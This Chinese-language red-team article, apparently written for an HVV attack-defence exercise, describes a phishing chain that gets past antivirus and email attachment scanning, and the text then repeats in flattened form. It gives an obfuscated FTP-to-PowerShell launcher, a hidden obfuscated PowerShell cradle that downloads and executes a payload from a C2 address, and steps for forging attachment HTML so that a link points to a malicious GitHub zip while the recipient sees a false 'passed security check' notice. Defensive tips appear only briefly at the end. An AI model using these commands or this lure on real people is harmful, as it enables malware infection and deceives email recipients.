【HVV2022】邮件钓鱼bypass附件检测&&杀软一把梭
字数 1223 2025-08-06 21:48:53

【HVV2022】邮件钓鱼bypass附件检测与杀软绕过技术分析

0x01 前言

本文详细分析了一种针对HVV(护网行动)的邮件钓鱼技术,该技术能够绕过常见的杀毒软件检测和邮箱附件安全检查。文章涉及的技术仅供安全研究和防御参考,关键品牌信息已做模糊处理。

0x02 杀软绕过技术(ByPass AV)

技术原理

  1. 文件托管策略

    • 将恶意文件托管在GitHub等可信代码托管平台
    • 利用平台信誉降低杀软检测概率

  2. 文件检测绕过

    • 压缩包形式分发,利用压缩文件检测盲区
    • 测试结果显示:VirusTotal 57家厂商中仅1家检测为恶意

  3. 执行流程

    FTP快捷方式 → 加载恶意DLL → 执行混淆PowerShell → C2上线

具体实现

  1. 恶意DLL文件(aaa.dll)

    !cmd /c po^we^rs^he^ll -ex^ec b^yp^ass .\\bbb.ps1
    • 利用FTP命令模式下!符号的命令执行特性
    • 通过字符混淆(^)绕过简单命令检测

  2. PowerShell脚本(bbb.ps1)

    powershell.exe -nOp -w hIdDEn -c $ExeCuTiOnCoNtExT.InvOkeCoMmAnD.NeWScriPtBlOcK("IE##X ((nE##w-ObJe##ct ('nE##T.wEB##cLiEnT')).('doWnl##OadStRiNg').inVo##KE('ht'+'tp:/'+'/19'+'2.16'+'8.20'+'6.1'+'32:8'+'0/a'))".Replace("##",""))
    • 关键绕过技术:
      • -nOp:NoProfile参数缩写
      • -w hIdDEn:窗口隐藏参数
      • 字符串拼接混淆(ht'+'tp:/'+'/...)
      • 字符替换混淆(##分隔符)
    • 最终下载执行C2服务器(192.168.206.132:80)的payload

  3. 效果评估

    • 静态查杀:可过所有静态检测
    • 动态检测:
      • 可过360杀毒(非卫士版)
      • 可过Windows Defender
      • 部分杀软会检测可疑PowerShell调用

0x03 邮箱附件检测绕过(ByPass 邮箱附件检测)

技术原理

  1. HTML附件伪装

    • 伪造正常邮件附件的HTML结构
    • 修改下载链接指向GitHub的恶意文件

  2. 检测机制绕过

    • 利用邮件客户端对HTML附件的解析特性
    • 附件检测仅针对直接上传文件,不检测外部链接内容

具体实现

  1. 获取恶意文件

    • 将代码托管到GitHub
    • 获取GitHub的zip下载链接: 
      https://codeload.github.com/punch0day/cs_test/zip/refs/heads/main

  2. 构造恶意HTML

    • 复制正常邮件附件的HTML代码
    • 修改<a>标签的href属性为GitHub下载链接
    • 关键修改点: 
      <a href="https://codeload.github.com/punch0day/cs_test/zip/refs/heads/main">下载</a>

  3. 邮件发送

    • 在邮件客户端中选择"插入HTML"功能
    • 粘贴修改后的HTML代码
    • 保持其他附件信息(文件名、大小等)不变

效果验证

  • 企业邮箱/个人邮箱均可绕过
  • 桌面端/移动端客户端均有效
  • 附件不会经过邮箱服务器的安全检测
  • 用户看到的是"已通过安全检测"的提示

0x04 防御建议

  1. 终端防护

    • 启用PowerShell脚本执行限制
    • 监控异常PowerShell进程创建
    • 限制FTP协议快捷方式的执行

  2. 邮件安全

    • 对邮件中的外部链接进行安全扫描
    • 实施附件内容实际检测而非仅依赖文件名/类型
    • 对GitHub等平台下载文件进行信誉评估

  3. 用户教育

    • 警惕非预期附件下载行为
    • 验证异常下载链接的真实性
    • 报告可疑邮件附件

0x05 参考文献

  1. 2022HVV系列|红蓝对抗之钓鱼篇:常见钓鱼思路总结
  2. PowerShell攻击的混淆方法总结

:本文所述技术仅用于安全研究目的,未经授权测试他人系统可能违反相关法律法规。

【HVV2022】邮件钓鱼bypass附件检测与杀软绕过技术分析 0x01 前言 本文详细分析了一种针对HVV(护网行动)的邮件钓鱼技术,该技术能够绕过常见的杀毒软件检测和邮箱附件安全检查。文章涉及的技术仅供安全研究和防御参考,关键品牌信息已做模糊处理。 0x02 杀软绕过技术(ByPass AV) 技术原理 文件托管策略 : 将恶意文件托管在GitHub等可信代码托管平台 利用平台信誉降低杀软检测概率 文件检测绕过 : 压缩包形式分发,利用压缩文件检测盲区 测试结果显示:VirusTotal 57家厂商中仅1家检测为恶意 执行流程 : 具体实现 恶意DLL文件(aaa.dll) : 利用FTP命令模式下 ! 符号的命令执行特性 通过字符混淆( ^ )绕过简单命令检测 PowerShell脚本(bbb.ps1) : 关键绕过技术: -nOp :NoProfile参数缩写 -w hIdDEn :窗口隐藏参数 字符串拼接混淆( ht'+'tp:/'+'/... ) 字符替换混淆( ## 分隔符) 最终下载执行C2服务器(192.168.206.132:80)的payload 效果评估 : 静态查杀:可过所有静态检测 动态检测: 可过360杀毒(非卫士版) 可过Windows Defender 部分杀软会检测可疑PowerShell调用 0x03 邮箱附件检测绕过(ByPass 邮箱附件检测) 技术原理 HTML附件伪装 : 伪造正常邮件附件的HTML结构 修改下载链接指向GitHub的恶意文件 检测机制绕过 : 利用邮件客户端对HTML附件的解析特性 附件检测仅针对直接上传文件,不检测外部链接内容 具体实现 获取恶意文件 : 将代码托管到GitHub 获取GitHub的zip下载链接: 构造恶意HTML : 复制正常邮件附件的HTML代码 修改 <a> 标签的 href 属性为GitHub下载链接 关键修改点: 邮件发送 : 在邮件客户端中选择"插入HTML"功能 粘贴修改后的HTML代码 保持其他附件信息(文件名、大小等)不变 效果验证 企业邮箱/个人邮箱均可绕过 桌面端/移动端客户端均有效 附件不会经过邮箱服务器的安全检测 用户看到的是"已通过安全检测"的提示 0x04 防御建议 终端防护 : 启用PowerShell脚本执行限制 监控异常PowerShell进程创建 限制FTP协议快捷方式的执行 邮件安全 : 对邮件中的外部链接进行安全扫描 实施附件内容实际检测而非仅依赖文件名/类型 对GitHub等平台下载文件进行信誉评估 用户教育 : 警惕非预期附件下载行为 验证异常下载链接的真实性 报告可疑邮件附件 0x05 参考文献 2022HVV系列|红蓝对抗之钓鱼篇:常见钓鱼思路总结 PowerShell攻击的混淆方法总结 注 :本文所述技术仅用于安全研究目的,未经授权测试他人系统可能违反相关法律法规。